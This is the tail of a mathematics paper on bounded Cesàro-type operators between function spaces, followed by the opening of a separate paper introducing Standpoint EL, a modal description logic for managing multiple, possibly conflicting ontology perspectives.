\|f\|_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0<r<1}\int_{0}^{1}\frac {(1-r)^{1-\frac{1}{q}}}{(1-tr)^{2+\delta_{p}-\frac{1}{q}}}d\mu(t)\] \[\lesssim \|f\|_{\mathcal{B}^{1+\frac{1}{p}}}.\] This gives \(\mathcal{C}_{\mu}:\mathcal{B}^{1+\frac{1}{p}}\to\Lambda_{\frac{1}{q}}^{q}\) is bounded. (2). Suppose \(\mu\) is a \(1\)-logarithmic \(1+\frac{1}{p}\)-Carleson measure. Let \(H^{p}\subseteq X\subseteq\mathcal{B}^{1+\frac{1}{p}}\) and \(f\in X\), then \(f\in X\subseteq\mathcal{B}^{1+\frac{1}{p}}\). Using the integral representation of \(\mathcal{C}_{\mu}\) we see that \[\mathcal{C}_{\mu}(f)^{\prime\prime}(z)=\int_{0}^{1}\frac{t^{2}f^{\prime\prime} (tz)}{1-tz}d\mu(t)+2\int_{0}^{1}\frac{t^{2}f^{\prime}(tz)}{(1-tz)^{2}}d\mu(t)+ 2\int_{0}^{1}\frac{t^{2}f(tz)}{(1-tz)^{3}}d\mu(t). \tag{3.4}\] It follows from Lemma 2.1 we have that \[|\mathcal{C}_{\mu}(f)^{\prime\prime}(z)| \lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\int_{0}^{1}\left( \frac{(1-t|z|)^{-2-\frac{1}{p}}}{|1-tz|}+\frac{(1-t|z|)^{-1-\frac{1}{p}}}{|1-tz |^{2}}+\frac{(1-t|z|)^{-\frac{1}{p}}}{|1-tz|^{3}}\right)d\mu(t)\] \[\lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\int_{0}^{1}\frac{1}{ (1-t|z|)^{2+\frac{1}{p}}|1-tz|}d\mu(t).\] By Fubini's theorem, Lemma 2.5 and Proposition 3.1, we have \[\sup_{0\leq r<1}(1-r)M_{1}(\mathcal{C}_{\mu}(f)^{\prime\prime},r)\] \[\lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0\leq r<1}(1-r) \int_{0}^{2\pi}\int_{0}^{1}\frac{d\mu(t)}{(1-tr)^{2+\frac{1}{p}}|1-tre^{i\theta }|}d\theta\] \[\lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0\leq r<1}\int_{ 0}^{1}\frac{1-r}{(1-tr)^{2+\frac{1}{p}}}\int_{0}^{2\pi}\frac{d\theta}{|1-tre^ {i\theta}|}d\mu(t)\] \[\lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0\leq r<1}\int_{ 0}^{1}\frac{(1-r)\log\frac{e}{1-tr}}{(1-tr)^{2+\frac{1}{p}}}d\mu(t)\] \[\lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\lesssim||f||_{X}.\] This gives \(\mathcal{C}_{\mu}:X\to\Lambda_{1}^{1}\) is bounded. Theorem 1.1 and Theorem 1.2 lead to the following result. **Corollary 3.6**.: _Suppose \(0<p\leq\infty\), \(1<q<\infty\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) be a subspace of \(H(\mathbb{D})\) with \(\Lambda^{q}_{\frac{1}{q}}\subseteq X\subseteq\mathcal{B}\). Then \(\mathcal{C}_{\mu}:H^{p}\to X\) is bounded if and only if \(\mu\) is a \(1+\frac{1}{p}\)-Carleson measure._ **Remark 3.7**.: _In [23], Blasco proved that \(\mathcal{C}_{\eta}:H^{1}\to\Lambda^{2}_{\frac{1}{2}}\) is bounded if and only if_ \[\sup_{n\geq 0}(n+1)^{3}\sum_{k=n}^{\infty}|\eta_{k}|^{2}<\infty, \tag{3.5}\] _where \(\eta\) is a complex Borel measure on \([0,1)\). See Theorem 3.7 in [23] for the detailed. If \(\mu\) is a positive Borel measure on \([0,1)\), then Corollary 3.6 shows that \(\mathcal{C}_{\mu}:H^{1}\to\Lambda^{2}_{\frac{1}{2}}\) is bounded if and only if \(\mu\) is a \(2\)-Carleosn measure. The condition (3.5) is equivalent to \(\mu\) is a \(2\)-Carleosn measure when \(\mu\) is a positive Borel measure on \([0,1)\). In fact,_ \[\infty>\sup_{n\geq 0}(n+1)^{3}\sum_{k=n}^{\infty}|\mu_{k}|^{2}\gtrsim\sup_{n \geq 0}(n+1)^{3}\sum_{k=n}^{2n}\mu_{k}^{2}\gtrsim\sup_{n\geq 0}(n+1)^{4}\mu_{2n} ^{2}.\] _On the other hand, if \(\mu\) is a \(2\)-Carleosn measure, we have_ \[\sup_{n\geq 0}(n+1)^{3}\sum_{k=n}^{\infty}|\mu_{k}|^{2} \lesssim\sup_{n\geq 0}(n+1)^{3}\sum_{k=n}^{\infty}\frac{1}{(k+1)^{4}}\] \[\lesssim\sup_{n\geq 0}(n+1)^{3}\int_{n+1}^{\infty}\frac{1}{x^{4}} dx\lesssim 1.\square\] For \(0<\lambda<1\), let \(p=\frac{2}{1-\lambda}\) in Theorem 1.2, then we may obtain the boundedness of \(\mathcal{C}_{\mu}\) acting from \(L^{2,\lambda}\) to the mean Lipschitz space \(\Lambda^{q}_{\frac{1}{q}}\). **Corollary 3.8**.: _Suppose \(0<\lambda<1\), \(1<p<\infty\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) be subspace of \(H(\mathbb{D})\) such that \(\Lambda^{p}_{\frac{1}{p}}\subseteq X\subseteq\mathcal{B}\). Then \(\mathcal{C}_{\mu}:L^{2,\lambda}\to X\) is bounded if and only if \(\mu\) is a \(\frac{3-\lambda}{2}\)-Carleson measure._ Proof of Theorem 1.3\((1)\Rightarrow(2)\).: Let \(\Lambda^{1}_{1}\subseteq X\subseteq\mathcal{B}\) and \(L^{2,\lambda}\subseteq Y\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}\). It is easy to check that \(g(z)=\log\frac{1}{1-z}\in X\) and \[\mathcal{C}_{\mu}(g)(z)=\sum_{k=0}^{\infty}\mu_{k}\left(\sum_{n=1}^{k}\frac{1} {n}\right)z^{n}.\] If \(\mathcal{C}_{\mu}(X)\subseteq Y\), then \(\mathcal{C}_{\mu}(g)\in Y\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}\). It follows from Lemma 2.1 that \[\sum_{k=1}^{\infty}k\mu_{k}\left(\sum_{n=1}^{k}\frac{1}{n}\right)r^{n}\lesssim \frac{1}{(1-r)^{\frac{3-\lambda}{2}}},\ \ r\in(0,1).\] For \(K\geq 2\) take \(r_{k}=1-\frac{1}{K}\). Since the sequence \(\{\mu_{k}\}\) is decreasing, simple estimations lead us to the following \[K^{\frac{3-\lambda}{2}} \gtrsim\sum_{k=1}^{\infty}k\mu_{k}\left(\sum_{n=1}^{k}\frac{1}{n} \right)r_{K}^{n}\] \[\gtrsim\sum_{k=1}^{K}k\mu_{k}\left(\sum_{n=1}^{k}\frac{1}{n} \right)r_{K}^{n}\] \[\gtrsim\sum_{k=1}^{K}k\mu_{k}\log kr_{K}^{n}\] \[\gtrsim\mu_{K}\sum_{k=1}^{K}k\log k\] \[\asymp\mu_{K}K^{2}\log K.\] Hence \(\mu_{K}\lesssim\frac{1}{K^{\frac{1+\lambda}{2}}\log K}\) which implies that \(\mu\) is a \(1\)-logarithmic \(\frac{1+\lambda}{2}\)-Carleson measure. \((2)\Rightarrow(1)\). Assume that \(\mu\) is a \(1\)-logarithmic \(\frac{1+\lambda}{2}\)-Carleson measure. It suffices to show that \(\mathcal{C}_{\mu}:\mathcal{B}\to L^{2,\lambda}\) is bounded. Let \(f\in\mathcal{B}\), it is clear that \[|\mathcal{C}_{\mu}(f)^{\prime}(z)| \leq\int_{0}^{1}\frac{|tf^{\prime}(tz)|}{|1-tz|}d\mu(t)+\int_{0} ^{1}\frac{|tf(tz)|}{|1-tz|^{2}}d\mu(t)\] \[\leq||f||_{\mathcal{B}}\int_{0}^{1}\frac{d\mu(t)}{|1-tz|(1-t|z|)} +||f||_{\mathcal{B}}\int_{0}^{1}\frac{\log\frac{e}{1-t|z|}}{|1-tz|^{2}}d\mu(t)\] This gives \[||\mathcal{C}_{\mu}(f)||_{L^{2,\lambda}}\asymp\sup_{w\in\mathbb{ D}}\left((1-|w|^{2})^{1-\lambda}\int_{\mathbb{D}}|\mathcal{C}_{\mu}(f)^{ \prime}(z)|^{2}(1-|\sigma_{w}(z)|^{2})dA(z)\right)^{\frac{1}{2}}\] \[\lesssim||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac {2-\lambda}{2}}\left(\int_{\mathbb{D}}\left(\int_{0}^{1}\frac{d\mu(t)}{|1-tz |(1-t|z|)}\right)^{2}\frac{1-|z|^{2}}{|1-z\overline{w}|^{2}}dA(z)\right)^{ \frac{1}{2}}\] \[+||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2- \lambda}{2}}\left(\int_{\mathbb{D}}\left(\int_{0}^{1}\frac{\log\frac{e}{1-t|z |}d\mu(t)}{|1-tz|^{2}}\right)^{2}\frac{1-|z|^{2}}{|1-z\overline{w}|^{2}}dA(z) \right)^{\frac{1}{2}}\] \[:=E_{1}+E_{2}.\] Since \(\mu\) is a \(1\)-logarithmic \(\frac{1+\lambda}{2}\)-Carleson measure, by the Minkowski inequality, Lemma 2.4 and Proposition 3.1, we have \[E_{2} :=||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2- \lambda}{2}}\left(\int_{\mathbb{D}}\left(\int_{0}^{1}\frac{\log\frac{e}{1-t|z|}d \mu(t)}{|1-tz|^{2}}\right)^{2}\frac{1-|z|^{2}}{|1-z\overline{w}|^{2}}dA(z) \right)^{\frac{1}{2}}\] \[\leq||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2- \lambda}{2}}\int_{0}^{1}\left(\int_{\mathbb{D}}\frac{\log^{2}\frac{e}{1-|z|}(1- |z|^{2})dA(z)}{|1-tz|^{4}|1-z\overline{w}|^{2}}\right)^{\frac{1}{2}}d\mu(t)\] \[\asymp||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1 -|w|^{2})^{\frac{2-\lambda}{2}}\log\frac{e}{1-t}}{(1-t)^{\frac{1}{2}}|1-t \overline{w}|}d\mu(t)\] \[\leq||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1 -|w|^{2})^{\frac{2-\lambda}{2}}\log\frac{e}{1-t}}{(1-t)^{\frac{1}{2}}(1-t|w|) ^{\frac{1+\lambda}{2}+\frac{2-\lambda}{2}-\frac{1}{2}}}d\mu(t)\] \[\lesssim||f||_{\mathcal{B}}.\] Note that \(\mu\) is also a \(\frac{1+\lambda}{2}\)-Carleson measure. Arguing as the proof of Theorem 1.1 (the case of \(\delta_{p}=0\)) we may obtain that \[E_{1}:=||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda}{2 }}\left(\int_{\mathbb{D}}\left(\int_{0}^{1}\frac{d\mu(t)}{|1-tz|(1-t|z|)} \right)^{2}\frac{1-|z|^{2}}{|1-z\overline{w}|^{2}}dA(z)\right)^{\frac{1}{2}} \lesssim||f||_{\mathcal{B}}.\] Therefore, we deduce that \[||\mathcal{C}_{\mu}(f)||_{L^{2,\lambda}}\lesssim||f||_{\mathcal{B}}.\] The proof is complete. \(\square\) **Corollary 3.9**.: _Suppose \(0<\lambda\leq 1\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) be subspace of \(H(\mathbb{D})\) such that \(\Lambda^{1}_{1}\subseteq X\subseteq\mathcal{B}\). Then \(\mathcal{C}_{\mu}:X\to L^{2,\lambda}\) is bounded if and only if \(\mu\) is a \(1\)-logarithmic\(\frac{1+\lambda}{2}\)-Carleson measure._ _Proof of Theorem 1.4_\((1)\Rightarrow(2)\). Arguing as the proof of Theorem 1.3 we may obtain that \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure. \((2)\Rightarrow(1)\). Suppose \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure and \(\Lambda^{1}_{1}\subseteq X,Y\subseteq\mathcal{B}\). Note that \(f\in X\subseteq\mathcal{B}\), by (3.5) we have \[|\mathcal{C}_{\mu}(f)^{\prime\prime}(z)| \lesssim||f||_{\mathcal{B}}\int_{0}^{1}\left(\frac{(1-t|z|)^{-2} }{|1-tz|}+\frac{(1-t|z|)^{-1}}{|1-tz|^{2}}+\frac{\log\frac{e}{1-t|z|}}{|1-tz|^ {3}}\right)d\mu(t)\] \[\lesssim||f||_{\mathcal{B}}\left(\int_{0}^{1}\frac{d\mu(t)}{(1-t| z|)^{2}|1-tz|}+\int_{0}^{1}\frac{\log\frac{e}{1-t|z|}d\mu(t)}{|1-tz|^{3}} \right).\] Using (1.2) and Fubini's theorem, Lemma 2.5 and Proposition 3.1, we have \[\sup_{0\leq r<1}(1-r)M_{1}(\mathcal{C}_{\mu}(f)^{\prime\prime},r)\] \[\lesssim||f||_{\mathcal{B}}\sup_{0\leq r<1}(1-r)\int_{0}^{2\pi}\int _{0}^{1}\frac{d\mu(t)}{(1-tr)^{2}|1-tre^{i\theta}|}d\theta\] \[+||f||_{\mathcal{B}}\sup_{0\leq r<1}(1-r)\int_{0}^{2\pi}\int_{0}^ {1}\frac{\log\frac{e}{1-tr}d\mu(t)}{|1-tre^{i\theta}|^{3}}d\theta\] \[\lesssim||f||_{\mathcal{B}}\sup_{0\leq r<1}\int_{0}^{1}\frac{1-r} {(1-tr)^{2}}\int_{0}^{2\pi}\frac{d\theta}{|1-tre^{i\theta}|}d\mu(t)\] \[\quad+||f||_{\mathcal{B}}\sup_{0\leq r<1}\int_{0}^{1}(1-r)\log \frac{e}{1-t}\int_{0}^{2\pi}\frac{d\theta}{|1-tre^{i\theta}|^{3}}d\mu(t)\] \[\lesssim||f||_{\mathcal{B}}\sup_{0\leq r<1}\int_{0}^{1}\frac{(1- r)\log\frac{e}{1-t}}{(1-tr)^{2}}d\mu(t)\] \[\lesssim||f||_{\mathcal{B}}.\] This yields that \(\mathcal{C}_{\mu}(f)\in\Lambda^{1}_{1}\subseteq Y\). \(\square\) Note that the spaces \(\Lambda^{p}_{\frac{1}{p}}\) for \(1\leq p<\infty\), the spaces \(Q_{p}\) for all \(0<p<\infty\) are satisfied the condition in Theorem 1.4. Therefore, we may obtain a number of results. _Proof of Theorem 1.5_ \((1)\Rightarrow(2)\). Let \(f(z)=(1-z)^{-\frac{1-\lambda_{1}}{2}}\), then Lemma 2.6 shows that \(f\in L^{2,\lambda_{1}}\subseteq X\). Note that \(\mathcal{C}_{\mu}(f)\in Y\subseteq\mathcal{B}^{\frac{3-\lambda_{2}}{2}}\) and \[\mathcal{C}_{\mu}(f)(z)=\sum_{k=0}^{\infty}\mu_{k}\left(\sum_{j=0}^{k}\frac{ \Gamma(\frac{1-\lambda_{1}}{2}+j)}{\Gamma(\frac{1-\lambda_{1}}{2})\Gamma(j+1) }\right)z^{k},\] By the Stirling formula, \[\frac{\Gamma(j+\frac{1-\lambda_{1}}{2})}{\Gamma(\frac{1-\lambda_{1}}{2}) \Gamma(j+1)}\asymp(j+1)^{-\frac{1+\lambda_{1}}{2}}\] for all nonnegative integers \(j\). This together with \(\{\mu_{k}\}\) is decreasing with \(k\) and Lemma 2.2 we deduce that \[1 \gtrsim n^{-\frac{3-\lambda_{2}}{2}}\sum_{k=1}^{n}k\mu_{k}\left( \sum_{j=0}^{k}\frac{\Gamma(\frac{1-\lambda_{1}}{2}+j)}{\Gamma(\frac{1-\lambda_ {2}}{2})\Gamma(j+1)}\right)\] \[\gtrsim n^{-\frac{3-\lambda_{2}}{2}}\sum_{k=1}^{n}k\mu_{k}\left( \sum_{j=0}^{k}(j+1)^{-\frac{1+\lambda_{1}}{2}}\right)\] \[\gtrsim n^{-\frac{3-\lambda_{2}}{2}}\mu_{n}\sum_{k=1}^{n}k^{\frac {3-\lambda_{1}}{2}}\] \[\gtrsim\mu_{n}n^{1+\frac{\lambda_{2}-\lambda_{1}}{2}}.\] Lemma 2.3 shows that \(\mu\) is a \(1+\frac{\lambda_{2}-\lambda_{1}}{2}\)-Carleson measure. \((2)\Rightarrow(1)\). It suffices to prove that \(\mathcal{C}_{\mu}:\mathcal{B}^{\frac{3-\lambda_{1}}{2}}\to L^{2,\lambda_{2}}\) is bounded. Let \(f\in\mathcal{B}^{\frac{3-\lambda_{2}}{2}}\), then (1.3) and Lemma 2.1 imply that \[|\mathcal{C}_{\mu}(f)^{\prime}(z)|\lesssim||f||_{\frac{3-\lambda_{1}}{2}}\int_ {0}^{1}\frac{d\mu(t)}{(1-t|z|)^{\frac{3-\lambda_{1}}{2}}|1-tz|}.\] Then arguing as the proof of Theorem 1.1 we can get the desired result. The proof is complete. \(\square\) **Corollary 3.10**.: _Suppose \(0<\lambda<1\), \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Then \(\mathcal{C}_{\mu}\) is a bounded operator on \(L^{2,\lambda}\) if and only if \(\mu\) is a \(1\)-Carleson measure._ ## Data Availability No data were used to support this study. ## Conflicts of Interest The authors declare that there is no conflict of interest. ## Funding The research is support by thee Natural Science Foundation of Hunan Province (No. 2022JJ30369).
2302.13187
Tractable Diversity: Scalable Multiperspective Ontology Management via Standpoint EL
The tractability of the lightweight description logic EL has allowed for the construction of large and widely used ontologies that support semantic interoperability. However, comprehensive domains with a broad user base are often at odds with strong axiomatisations otherwise useful for inferencing, since these are usually context-dependent and subject to diverging perspectives. In this paper we introduce Standpoint EL, a multi-modal extension of EL that allows for the integrated representation of domain knowledge relative to diverse, possibly conflicting standpoints (or contexts), which can be hierarchically organised and put in relation to each other. We establish that Standpoint EL still exhibits EL's favourable PTime standard reasoning, whereas introducing additional features like empty standpoints, rigid roles, and nominals makes standard reasoning tasks intractable.
Lucía Gómez Álvarez, Sebastian Rudolph, Hannes Strass
2023-02-25T22:59:04Z
http://arxiv.org/abs/2302.13187v1
# Tractable Diversity: ###### Abstract The tractability of the lightweight description logic \(\mathcal{EL}\) has allowed for the construction of large and widely used ontologies that support semantic interoperability. However, comprehensive domains with a broad user base are often at odds with strong axiomatisations otherwise useful for inferencing, since these are usually context dependent and subject to diverging perspectives. In this paper we introduce _Standpoint \(\mathcal{EL}\)_, a multi-modal extension of \(\mathcal{EL}\) that allows for the integrated representation of domain knowledge relative to diverse, possibly conflicting _standpoints_ (or contexts), which can be hierarchically organised and put in relation with each other. We establish that _Standpoint \(\mathcal{EL}\)_ still exhibits \(\mathcal{EL}\)'s favourable ptine standard reasoning, whereas introducing additional features like empty standpoints, rigid roles, and nominals makes standard reasoning tasks intractable. ## 1 Introduction In many subfields of artificial intelligence, ontologies are used to provide a formal representation of a shared vocabulary, give meaning to its terms, and describe the relations between them. To this end, one of the most prominent and successful class of logic-based knowledge representation formalisms are _description logics_ (DLs) [1, 1], which provide the formal basis for most recent version of the Web Ontology Language OWL 2 [1]. Among the most widely used families of DLs used today is \(\mathcal{EL}\)[1], which is the formal basis of OWL 2 EL [1], a popular tractable profile of OWL 2. One of the main appeals of \(\mathcal{EL}\) is that basic reasoning tasks can be performed in polynomial time with respect to the size of the ontology, enabling reasoning-supported creation and maintenance of very large ontologies. An example of this is the healthcare ontology SNOMED CT [1], with worldwide adoption and a broad user base comprising clinicians, patients, and researchers. However, when modelling comprehensive ontologies like SNOMED CT, one is usually facing issues related to context or perspective-dependent knowledge as well as ambiguity of language [1]. For instance, the concept \(\mathtt{Tumour}\) might denote a process or a piece of tissue; \(\mathtt{Alergy}\) may denote an allergic reaction or just an allergic disposition. In a similar vein, the decentralised nature of the Semantic Web has led to the generation of various ontologies of overlapping knowledge that inevitably reflect different points of view. For instance, an initiative has attempted to integrate the FMA1140 (Foundational Model of Anatomy), SNOMED-CT, and the NCI (National Cancer Institute Thesaurus) into a single combined version called LargeBio and reported ensuing challenges [1]. In this context, frameworks supporting the integrated representation of multiple perspectives seem preferable to recording the distinct views in a detached way, but also to entirely merging them at the risk of causing inconsistencies or unintended consequences. To this end, Gomez Alvarez and Rudolph [1] proposed _standpoint logic_, a formalism inspired by the theory of super-valuantiansim [15] and rooted in modal logic, which allows for the simultaneous representation of multiple, potentially contradictory, viewpoints in a unified way and the establishment of alignments between them. This is achieved by extending the base language with labelled modal operators, where propositions \(\square_{\mathbb{S}}\phi\) and \(\Diamond_{\mathbb{S}}\phi\) express information relative to the _standpoint_\(\mathbb{S}\) and read, respectively: "according to \(\mathbb{S}\), it is _unequivovcal/conceivable_ that \(\phi\)". Semantically, standpoints are represented by sets of _presifications_,1 such that \(\square_{\mathbb{S}}\phi\) and \(\Diamond_{\mathbb{S}}\phi\) hold if \(\phi\) is true in all/some of the precisifications associated with \(\mathbb{S}\). Consider the following example. Footnote 1: Precisifications are analogous to the _worlds_ of modal-logic frameworks with possible-worlds semantics. **Example 1** (Tumour Disambiguation).: _Two derivatives of the SNOMED CT ontology (\(\mathtt{SN}\)) model tumours differently. According to \(\mathtt{TP}\), a \(\mathtt{Tumour}\) is a process by which abnormal or damaged cells grow and multiply (1), yet according to \(\mathtt{TT}\), a \(\mathtt{Tumour}\) is a lump of tissue (2)._ \[\square_{\mathtt{TP}}[\mathtt{Tumour}\sqsubseteq\mathtt{AbnormalGrowthProcess}] \tag{1}\] \[\square_{\mathtt{TT}}[\mathtt{Tumour}\sqsubseteq\mathtt{Tissue}] \tag{2}\] _Both interpretations inherit the axioms of the original SNOMED CT (3) and are such that if according to \(\mathtt{SN}\) something is arguably both a \(\mathtt{Tumour}\) and a \(\mathtt{Tissue}\), then it (unequivovidocally) is a \(\mathtt{Tumour}\) according to \(\mathtt{TT}\) (4). The respective assertion is made for_ TP _(5). But_ Tissue _and_ Process _are disjoint categories according to_ SN _(6)._ \[(\mathsf{TP}\preceq\mathsf{SN}) (\mathsf{TT}\preceq\mathsf{SN}) \tag{3}\] \[\lozenge_{\mathsf{SN}}[\mathsf{Tumour}\sqcap\mathsf{Physicalobject}] \subseteq\square_{\mathsf{Tr}}[\mathsf{Tumour}]\] (4) \[\lozenge_{\mathsf{SN}}[\mathsf{Tumour}\sqcap\mathsf{Process}] \subseteq\square_{\mathsf{Tr}}[\mathsf{Tumour}]\] (5) \[\square_{\mathsf{SN}}[\mathsf{Tissue}\sqcap\mathsf{Process} \subseteq\bot] \tag{6}\] _While clearly incompatible, both perspectives are semantically close and we can establish relations between them. For instance, we might assert that something is unequivocally the product of a_ Tumour _(process) according to_ TP _if and only if it is arguably a_ Tumour _(tissue) according to_ TT _(7). Or we may want to specify a subsumption between the classes of unequivocal instances of_ Tissue _according to_ TT _and to_ TP _(8)._ \[\square_{\mathsf{TP}}[\exists\mathsf{ProductOf.Tumour}] \equiv\lozenge_{\mathsf{TT}}[\mathsf{Tumour}] \tag{7}\] \[\square_{\mathsf{TT}}[\mathsf{Tissue}] \subseteq\square_{\mathsf{TP}}[\mathsf{Tissue}] \tag{8}\] _When recording clinical findings, clinicians may use ambiguous language, so an automated knowledge extraction service may obtain the following from text and annotated scans:_ \[\square_{\mathsf{SN}}[\mathsf{Patient}(p1),\,\mathsf{HasPart}(p1, a),\,\mathsf{Colon}(a) \tag{9}\] \[\lozenge_{\mathsf{SN}}[\mathsf{HasPart}(a,b),\,\mathsf{Tumour}(b), \,\mathsf{PhysicalObject}(b) \tag{10}\] The logical statements (1)-(10), which formalise Example 1 by means of a standpoint-enhanced \(\mathcal{EL}\) description logic, are not inconsistent, so all axioms can be jointly represented. Let us now illustrate the use of standpoint logic for reasoning with and across individual perspectives. **Example 2** (Continued from Example 1).: _In this case, we can disambiguate the information given by Axiom (10) using Axiom (3) and Axiom (4), which entail that according to_ TT_, \(b\) is unequivocally a tumour, \(\square_{\mathsf{TT}}\mathsf{Tumour}(b)\), and with Axiom (2) also a tissue, \(\square_{\mathsf{TT}}\mathsf{Tissue}(b)\). Moreover, we can use the "bridges" to switch to another perspective. From Axiom (8), it is clear that according to_ TP_, \(b\) is also a tissue, \(\square_{\mathsf{TP}}\mathsf{Tissue}(b)\), and from Axiom (7) \(b\) is the product of a tumour, \(\square_{\mathsf{TP}}\exists\mathsf{ProductOf.Tumour}(b)\). Then Axiom (1) yields_ \[\square_{\mathsf{TP}}\exists\mathsf{ProductOf.(Tumour}\sqcap\mathsf{ AbnormalGrowthProcess})(b).\] _The statement \(\square_{\mathsf{SN}}[\mathsf{Tumour}\sqcap\mathsf{Process}](d)\), in contrast, will trigger an inconsistency thanks to Axiom (6), which prevents the evaluation of_ Tumour _simultaneously as a_ Tissue _and a_ Process _and Axiom (2), which states that according to some interpretations, a_ Tumour _is a_ Tissue_. Finally, a user (e.g. a specific_ clinic_,_ CL_) may inherit the_ NOMED CT \((\mathsf{CL}\preceq\mathsf{SN})\) _and establish further axioms, e.g._ \[\square_{\mathsf{CL}}[\mathsf{Patient}\sqcap\exists\mathsf{HasPart.(Colon}\sqcap\lozenge_{\mathsf{SN}}\exists\mathsf{HasPart.Tumour})\sqsubseteq\] \[\exists\mathsf{AssociatedWith.ColonCancerRisk}],\] _to identify patients with cancer risk. Here, one can infer with Ax. (9) that \(\square_{\mathsf{CL}}\exists\mathsf{AssociatedWith.ColonCancerRisk}(p1)\). \(\lozenge\)_ The need of handling multiple perspectives in the Semantic Web has led to several (non-modal) logic-based proposals. The closest regarding goals are multi-viewpoint ontologies [11, 12], which model the intuition of viewpoints in a tailored extension of OWL for which no complexity bounds are given. Similar problems are also addressed in the more extensive work on contextuality (e.g. C-OWL and Distributed ontologies [1, 1] and the Contextualised Knowledge Repository (CKR) [2]). These frameworks focus on contextual and distributed reasoning and range between different levels of expressivity for modelling the structure of contexts and the bridges between them. In the context of scalable reasoning, one should highlight the implementations that provide support for OWL2-RL based CKR defeasible reasoning [1]. As for modal logics, their suitability to model perspectives and contexts in a natural way is obvious [23, 13, 14], they are well-known in the community and their semantics is well-understood. Yet, the interplay between DL constructs and modalities is often not well-behaved and can easily endanger the decidability of reasoning tasks or increase their complexity [1, 15, 16]. Notable examples are NExpTime-completeness of the multi-modal description logic \(\mathbf{K}_{\mathcal{ALC}}\)[11] and 2ExpTime-completeness of \(\mathcal{ALC}_{\mathcal{ALC}}\)[23], a modal contextual logic framework in the style proposed by McCarthy [15]. In this work, we focus on the framework of _standpoint logics_[14], which are modal logics, too, but come with a simplified Kripke semantics. Recently, Gomez Alvarez _et al._[14] introduced _First-Order_ Standpoint Logic (FOSL) and showed favourable complexity results for its _sentential_ fragments,2 which disallow modal operators being applied to formulas with free variables. In particular, adding sentential standpoints does not increase the complexity for fragments that are NP-_hard_. Yet, a fine-grained terminological alignment between different perspectives requires concepts preceded by modal operators, as in Axiom (7), leading to non-sentential fragments of FOSL. Footnote 2: This includes the sentential standpoint variant of the expressive DL \(\mathcal{SROIQb}_{s}\), a logical basis of OWL 2 DL [13]. Our paper is structured as follows. After introducing the syntax and semantics of Standpoint \(\mathcal{EL}\) (\(\mathbb{S}_{\mathcal{EL}}\)) and a suitable normal form (Section 2), we establish our main result: satisfiability checking in \(\mathbb{S}_{\mathcal{EL}}\) is PTime. We show this by providing a worst-case optimal tableau-based algorithm (Section 3) that takes inspiration in the _quasi-model_ based methods [13] as used for \(K_{\mathcal{ALC}}\)[11], but differs in its specifics. Our approach builds a _quasi-model_ from a graph of _(quasi) domain elements_, which are annotated with various constraints, to then reconstruct the worlds or, in our case, precisifications. We also show that introducing additional features such as empty standpoints, rigid roles, and nominals make standard reasoning tasks intractable (Section 4). In Section 5, we conclude the paper with a discussion of future work, including efficient approaches for reasoner implementations. Altogether, this paper provides a clear pathway for making scalable multi-interspective ontology management possible. An extended version of the paper with proofs of all results is available as a technical appendix. ## 2 Syntax, Semantics, and Normalisation We now introduce syntax and semantics of Standpoint \(\mathcal{EL}\) (referred to as \(\mathbb{S}\varepsilon\mathcal{L}\)) and propose a normal form that is useful for subsequent algorithmic considerations. **Syntax** A _Standpoint DL vocabulary_ is a traditional DL vocabulary consisting of sets \(N_{\mathsf{C}}\) of _concept names_, \(N_{\mathsf{R}}\) of _role names_, and \(N_{\mathsf{I}}\) of _individual names_, extended it by an additional set \(N_{\mathsf{S}}\) of _standpoint names_ with \(*\in N_{\mathsf{S}}\). A _standpoint operator_ is of the form \(\Diamond_{\mathsf{s}}\) ("diamond") or \(\Box_{\mathsf{s}}\) ("box") with \(\mathsf{s}\in N_{\mathsf{S}}\); we use \(\odot_{\mathsf{s}}\) to refer to either. A _concept term_ is defined via \[C::=\top\ |\ \perp\ |\ \ A\ \ |\ \ C_{1}\sqcap C_{2}\ |\ \ \exists R.C\ |\ \odot_{ \mathsf{s}}[C]\] where \(A\in N_{\mathsf{C}}\) and \(R\in N_{\mathsf{R}}\). A _general concept inclusion (GCI)_ is of the form \(\odot_{\mathsf{s}}[C\sqsubseteq D]\), where \(C\) and \(D\) are concept terms.3 A _concept assertion_ is of of the form \(\odot_{\mathsf{s}}[C(a)]\) while a _role assertion_ is of the form \(\odot_{\mathsf{s}}[R(a,b)]\), where \(a,b\in N_{\mathsf{I}}\), \(C\) is a concept term, and \(R\in N_{\mathsf{R}}\). A _sharpening statement_ is of the form \(\preceq\mathsf{s}^{\prime}\) where \(\mathsf{s},\mathsf{s}^{\prime}\in N_{\mathsf{S}}\). Footnote 3: The square brackets \([\ldots]\) indicate the scope of the modality, as the same modalities may be used inside concept terms. A _S\({}_{\mathcal{E}\mathcal{L}}\) knowledge base_ is a tuple \(\mathcal{K}=\langle\mathcal{S},\mathcal{T},\mathcal{A}\rangle\), where \(\mathcal{T}\) is a set of GCIs, called _TBox_, \(\mathcal{A}\) is a set of (concept or role) assertions, called _ABox_; and \(\mathcal{S}\) is a set of sharpening statements, called _SBox_. We refer to 